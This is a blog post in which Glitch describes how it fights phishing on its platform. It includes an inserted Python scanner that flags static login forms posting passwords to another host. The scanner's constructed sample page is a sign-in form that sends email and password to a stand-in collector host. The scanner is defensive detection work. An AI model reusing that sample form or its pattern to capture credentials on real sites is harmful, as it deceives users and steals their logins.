How we keep Glitch sites secure and trusted
Over the years, we’ve done a lot of work to make sure apps and sites that are published on Glitch are trustworthy. That’s our responsibility as a platform, but it’s also good for our community, as it means your apps will be part of a healthy, trustworthy ecosystem. It’s been a while since we’ve shared details of this work, so we wanted to share a high-level overview of how we think about the challenge. We've got some wins to celebrate, some lessons learned, and a clear sense of where our future challenges lie.
**TL;DR:** Glitch intentionally makes app creation as easy and open as possible, which also opens the platform to more potential misuse, including phishing sites. By working with a community of security researchers and our own user community, we've been able to significantly improve both our response time and our proactive removal of potentially harmful content over the last year. Today, less than one half of one percent of new apps created on Glitch are flagged as potentially harmful, and that share is going down over time. The mean time-to-resolution for reports of potential risk continues to improve, along with faster and more comprehensive suspension and blocking of users who create potentially harmful sites. We expect future challenges to come from phishing attempts that are built across multiple sites, and we will be working with the other platforms in the ecosystem to address those threats as they arise.
Reducing Barriers
First, let’s consider what problem we’re trying to solve. Glitch is designed to make it as easy as possible to create full-stack websites without any barriers. In any system, reducing barriers to creation also makes it easier for bad actors to abuse the system for malicious creations. In our particular case, Glitch allows creating web pages or apps without even logging in, so reducing potential abuse is even trickier than on platforms that rely on traditional authentication.
The next question that arises is what kind of untrustworthy content could be created on Glitch. The primary concern is the creation of phishing sites designed to capture users’ credentials or personal information. Over the years we’ve used a series of layered approaches to counter this risk, each building on the prior efforts. (This is a high-level overview so our community knows our philosophy on handling the problem, not an exhaustive technical review of everything we’ve done.)
- We began with a selective reduction in privileges for anonymous accounts, including limits on the automated creation of projects or content on Glitch. By introducing a CAPTCHA for app creation, we greatly reduced the number of projects created by bots or automated systems without compromising the ability of users to make apps without logging in. (This is a common use case for students using Glitch in schools, for example.)
- Within projects, we limited access to a very small subset of code libraries that were primarily being used in abusive or malicious ways, and added systems for scanning for known malicious content. Together, these efforts have been extremely effective in curtailing potentially harmful projects while having very little impact on legitimate users of the platform.
- We’ve worked with outside security organizations to build automated scanning for malicious projects if any get past our internal controls, including partners like Phishlabs and Netcraft, and resources like openphish.com and urlscan.io. The research community that works diligently around these issues has been incredibly supportive of our efforts here, especially over the last year or so as we’ve begun tying their work more closely into our internal tooling for preventing or suspending malicious project creation.
- Being a community-based platform, we’ve also made continual improvements to our community reporting functions. Every page of the Glitch.com site includes a “report abuse” button, and every report sent through that system receives a response within 24 business hours. In the vast majority of cases, user-submitted abuse reports cover sites that our internal tools have already flagged for review, which means we've often taken action even before letting the reporting user know that we've done so.
- Finally, we’ve built tools to make our response times even faster. We’ve always had a straightforward security reporting infrastructure with defined processes for handling reported security or trust issues, but thanks to the upgrades we’ve put in place, we’re able to act more quickly to take down malicious projects, and even to take action on the accounts that create malicious content. These changes have yielded improvements across the board. Better support tools have actually helped all Glitch users: our mean time to response for any support ticket has decreased by nearly 40% even as the volume of support requests has increased by almost 75%.
But specific to issues around malicious content on Glitch, we’ve found that, from a sampling of 50,000 projects created during November 2021, fewer than 0.3% were flagged as potentially harmful content by either our systems or the reports generated by our partners. We’re working to improve this further, but consider it a good sign of progress in addressing the issue.
With any security or trust domain, success in one area always shifts the battleground a bit to new areas. For example, while we initially focused on malicious full-stack apps as the biggest area of concern on Glitch, more recent reports show that bad actors are increasingly using static resources (sometimes static HTML, sometimes other document formats like PDF) to try to capture credentials, with the form submission itself usually pointing at other, larger providers such as the major cloud hosting platforms. These static resources are typically served as assets on Glitch rather than through the core app hosting platform, so they produce different signals than a potentially harmful full-stack app would.
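The pattern above, a static page that looks like a login form but posts the credentials to a third-party host, is something a reviewer can check for mechanically. The following is an added, illustrative heuristic scanner, not Glitch's own tooling: it parses a static HTML asset with Python's standard-library HTML parser, collects every form, and flags a form when it contains a password field and its `action` resolves to a host other than the one serving the asset. The hosting host `cdn.example.test` and the two sample pages are constructed for this example. It deliberately ignores PDFs and obfuscated JavaScript submissions, which need separate handling.

```python
"""Heuristic check of a static HTML asset for a credential-capture form
that posts to a third-party host.  Added example, not Glitch's tooling."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hypothetical host the static asset is served from (assumption for this example).
ASSET_HOST = "cdn.example.test"


class _FormCollector(HTMLParser):
    """Collect each <form> with its action and the types of <input> it contains."""

    def __init__(self):
        super().__init__()
        self.forms = []          # list of {"action": str, "inputs": [input types]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)          # attribute values may be None for bare attributes
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            # A missing type attribute defaults to "text" in HTML.
            self._current["inputs"].append((a.get("type") or "text").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def external_host(action, asset_host):
    """Return the target host if the form posts to a host other than the asset's own,
    otherwise None.  Relative and empty actions post back to the asset's host."""
    if not action:
        return None
    parts = urlsplit(action)
    if parts.scheme not in ("http", "https", ""):
        return None              # mailto:, javascript:, data: etc. are out of scope here
    if not parts.netloc:
        return None              # relative action: same host as the asset
    host = (parts.hostname or "").lower()
    return host if host != asset_host.lower() else None


def scan_static_html(html, asset_host=ASSET_HOST):
    """Flag forms that collect a password and send it off-host."""
    parser = _FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        target = external_host(form["action"], asset_host)
        if "password" in form["inputs"] and target:
            findings.append({"action": form["action"], "exfil_host": target})
    return {"forms": len(parser.forms), "flagged": bool(findings), "findings": findings}


# Constructed sample pages for the example (not real phishing content).
SUSPECT_PAGE = """
<html><body>
<h1>Sign in</h1>
<form method="post" action="https://collector.example.net/submit.php">
  <input type="email" name="user">
  <input type="password" name="pass">
  <button>Sign in</button>
</form>
</body></html>
"""

BENIGN_PAGE = """
<html><body>
<form method="post" action="/api/login">
  <input type="text" name="user">
  <input type="password" name="pass">
</form>
<form action="https://search.example.org/q"><input type="search" name="q"></form>
</body></html>
"""

if __name__ == "__main__":
    print(scan_static_html(SUSPECT_PAGE))
    print(scan_static_html(BENIGN_PAGE))
```

The benign page shows the two cases the heuristic must not trip on: a password form posting to a relative path on the same host, and an off-host form that carries no password field. A scheme-relative action like `//collector.example.net/x` is still treated as off-host, since browsers resolve it to a different origin.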
We’ve worked with our partners to update our monitoring to cover these new attack vectors, and initial results are promising. What we take away from this is that we’ll increasingly see sophisticated attempts that span multiple services, with Glitch (or part of Glitch’s infrastructure) being just one intermediary in a larger, networked effort. One such recent set of attempts was documented by DomainTools, which examined these phishing attempts in depth, revealing both their intended targets (businesses with employees working in the Middle East) and their mechanism for capturing data (compromised WordPress sites forwarding to an Outlook email address), which shows the complexity of tracking these efforts across multiple services. While these patterns are well established in the general web hosting industry, they're relatively new to Glitch as a community, and they represent novel iterations on the pattern that will take time to fully prevent. We expect to gain some advantages in this work over time by relying on the social aspects of our platform to better distinguish the small number of malicious actors from the millions of legitimate users.
Overall, we’ve been grateful for the support of our community, including both our users who report potentially harmful apps, as well as the security researchers who provide infrastructure for proactively stopping bad actors. Over time, we’ve gotten better and better at reducing the amount of potential risk on Glitch, both in the absolute and as a percentage of what gets created on the platform every day. We are firmly committed to keeping creation and remixing on Glitch as open and accessible as possible, which means we’re also committed to being responsible for stopping the inevitable misuses that come along with that openness. And we’re glad to do it, because it means that Glitch gets to keep being a great, trusted place for you to make the most creative, interesting, innovative, and useful stuff on the web.